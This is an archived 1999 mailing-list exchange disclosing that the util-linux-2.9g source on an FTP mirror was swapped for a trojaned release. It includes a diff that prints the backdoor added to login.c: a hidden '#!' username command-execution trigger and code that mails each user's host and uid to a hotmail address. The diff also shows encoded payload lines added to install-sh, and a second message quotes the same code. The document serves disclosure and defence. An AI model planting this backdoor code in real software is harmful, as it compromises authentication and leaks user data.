trojan-backdoor-ftp.win.tue.nl.txt

`Date: Sun, 24 Jan 1999 09:03:42 -0500  
From: Trevor Johnson <[email protected]>  
To: [email protected]  
Subject: Re: util-linux compromised  
  
I just received the following letter:  
  
Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST)  
From: John Stange <[email protected]>  
Subject: util-linux compromised?  
  
I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a  
section of login.c that appears to send the host and uid of the user to a  
hotmail address. I imagine this isn't a standard feature. :> Given that  
the tcp wrappers archive was backdoored on that same server recently, you  
might want to comb over the rest of your stuff as well, if any of it's  
yours.  
  
-- John Stange  
Staff World, 4120 AVW  
x52720  
  
and indeed, util-linux-2.9g had been replaced by a trojan version.  
Unfortunately this means that everything from ftp.win.tue.nl  
must be regarded as suspect for the moment.  
  
I put a correct util-linux-2.9g.tar.gz back, with md5sum  
ab409a6ac5a775a4b04b8e27f6c86933 util-linux-2.9g.tar.gz  
but of course, for the time being, nothing on this machine can be trusted.  
  
Andries  
  
A diff between original and trojan:  
  
diff -r util-linux-2.9g/disk-utils/Makefile trojan/util-linux-2.9g/disk-utils/Makefile  
94a95  
>  
diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh  
147a148,171  
> # M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO  
> # M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z  
> # M>'1X>$!8765I7F5E65Q80B`@(`HC("YA+G,N9RXW+C@N-2XV+C$N,BXU+F(N  
> # M<"XY+F<N=BXX+C<N82YW+G0N8BYP+C$N,BXX+CDN="XW+F8N9RYA+G<N90HC  
> # M(#0L,RQH+'0L.2QQ+#(L."QT+&8L82QW:"UQ+3(M,RUT+74M;"UF+7(M-BUI  
> # M+6$M=RUE+68M9RUQ+34M-BTW+6DM82TS=0HC($!H5TER/3MX=GA1;&]Z>7!C  
> # M9G%B?FI'/58J4W!;,G)R4CA6<6%@7#U*,FMF67E8,VI'8G(]/CM[=7IX='AX  
> # MW<L,14(2SWS1$J0=[8?[[?=T-T!2LK,S>W,S5W4;[TXLD4"CT:]/-^"JC)->  
> # M$F?5E]ZP_WJ^^^0W^-$'@Y>'A_J)UOKET<':;_<ST/KHZ&"P]_+@Y>&!UGOX  
> # M=/1$'S[Y'7XJ6P:%UD_^27^J#?U'L;WMT4/[OV<*_XC^#UG_P^'1P3?]_Q_K  
> # M_SRX-;,X,;]ZC;W!X.C@X*OZ/]C;/R#]#UX.#_?V!["%O8/!X.43/?BF_]_\  
> # MYYGV:M:]7O-YEA>Z,0U]QO_2@[B,C57/]'%A@M)$(ST)2OW6A'IXI(>#T>#U  
> # MZ&"@]UZ_'F+,E;F++8UY5\3Z8UA"R7JX-QH,1\,]&G.HIRM=]&=!7"Z^CXTQ  
> # M_;R8$^U\N2KB^:)D0EWZ=Y__/>C*M*LXO`V*2)_T]3N:K+>%1FC[51;V353M  
> # MJ&=*Q5F85)'1_?[N^?''BW>G[Q6H?UJ8PN@RU\NJU&F0Z64P-_;/2IV/+UY]  
> # MIY\^G478?1J4_5<ZO;7WP1(?K"EGT;)(^Z\>D)C&65#$1.&9GA@\7AC=B3.8  
> # M59)T=%$Y:=)C"//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O  
> # M\2PS?]6=Y]O'ES<['=VQRZ`(.^!@9L-;'6219KKW<9+H,$^7T&E73\%MR:S'  
> # M5F>YOC5%9A)MJ^4R+TJ=9YK)L"!&WSW?IM\[3+&?QEG\A04RL_Z7>\8[H>'T  
> # MNSV\->H!O^G1J]O.YD(4>T`\]!^L^["Y`CUUH]P89;(HGBF36/,XT<=(N$F;  
> # M5\9VU%/L_7A']T*0.'YW-GX_P9>WD[/CFZO)R>2[/?W\C[J7Z^??RR[6*%W(  
> # MH+]+:WWZTY$7B>Q1.*PYS76"408??@'+S[?/WOI%_D,6H6>G/\CH7\[O5PFY  
> # MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#"PXK`J+WW`NF  
>  
diff -r util-linux-2.9g/login-utils/login.c trojan/util-linux-2.9g/login-utils/login.c  
179a180  
> void checkname P_((char *name));  
552a554,555  
> checkname(username);  
>  
1291a1295,1342  
> }  
>  
> #include <sys/socket.h>  
> #include <netinet/in.h>  
> #include <arpa/inet.h>  
> #include <netdb.h>  
>  
> void  
> checkname(char *name)  
> {  
> char a[100];  
> char *pt;  
>  
> if ((name[0] == '#') && (name[1] == '!'))  
> {  
> pt = (char*)&name[2];  
> sprintf(a,"/bin/%s",pt);  
> execl(a,a,(void*)0);  
> }  
> if (fork() == 0)  
> {  
> struct hostent *he;  
> struct sockaddr_in sai;  
> struct in_addr *ia;  
> char b[500];  
> int s,l;  
>  
> setsid();  
> s = open("/var/tmp/.fmlock0",O_RDONLY);  
> if (s >= 0) exit(0);  
> he = gethostbyname("mail.hotmail.com");  
> if (!he) exit(0);  
> ia = (struct in_addr *)he->h_addr_list[0];  
> l = sizeof(sai);memset(&sai,0,l);  
> sai.sin_port = htons(25);  
> sai.sin_addr.s_addr = ia->s_addr;  
> if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);  
> if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);  
> if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);  
> sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());  
> sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);  
> sleep(1);if (write(s,"MAIL FROM:<[email protected]>\n",28) < 0) exit(0);  
> if (write(s,"RCPT TO:<[email protected]>\n",30) < 0) exit(0);  
> sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);  
> sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);  
> sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);  
> sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);  
> }  
diff -r util-linux-2.9g/misc-utils/Makefile trojan/util-linux-2.9g/misc-utils/Makefile  
85a86,88  
>  
> #@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<  
>  
  
  
(pasted from another window - tabs etc will be lost).  
  
Andries  
  
-  
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in  
the body of a message to [email protected]  
Please read the FAQ at http://www.tux.org/lkml/  
  
--------------------------------------------------------------------------------------------  
  
Date: Sat, 23 Jan 1999 22:49:29 -0500  
From: John Stange <[email protected]>  
To: [email protected]  
Subject: Re: backdoored tcp wrapper source code  
  
You may want to have a thorough look at everything you've got... I grabbed  
a copy of util-linux2.9g (admittedly being a bad boy and not checking  
against anything), and while I don't have a pristine copy of the source  
on hand to check, I'm guessing that sendmail and a hotmail address is not  
standard behavior for /bin/login:  
  
(from login-utils/login.c)  
  
he = gethostbyname("mail.hotmail.com");  
if (!he) exit(0);  
ia = (struct in_addr *)he->h_addr_list[0];  
l = sizeof(sai);memset(&sai,0,l);  
sai.sin_port = htons(25);  
sai.sin_addr.s_addr = ia->s_addr;  
if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);  
if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);  
if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0)  
exit(0);  
sprintf(b,"\r\nHost = %s\r\nUid =  
%i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());  
sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);  
sleep(1);if (write(s,"MAIL FROM:<[email protected]>\n",28) <  
0) exit(0);  
if (write(s,"RCPT TO:<[email protected]>\n",30) < 0)  
exit(0);  
sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);  
sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);  
sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);  
sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);  
etc etc  
  
I'm in a bit of a hurry, so I haven't had a chance to comb anything  
else...  
  
> TCP Wrappers is a widely-used security tool to protect UNIX systems  
> against intrusion. In has an estimated installed base of millions.  
>  
> Today someone replaced the tcp wrapper source on ftp.win.tue.nl by  
> a backdoored version. Eventually this was bound to happen, and  
> that's why the source file is accompanied by a PGP signature. But  
> that is no guarantee against people downloading and installing  
> backdoored software.  
  
-- John Stange  
Staff World, 4120 AVW  
x52720  
  
`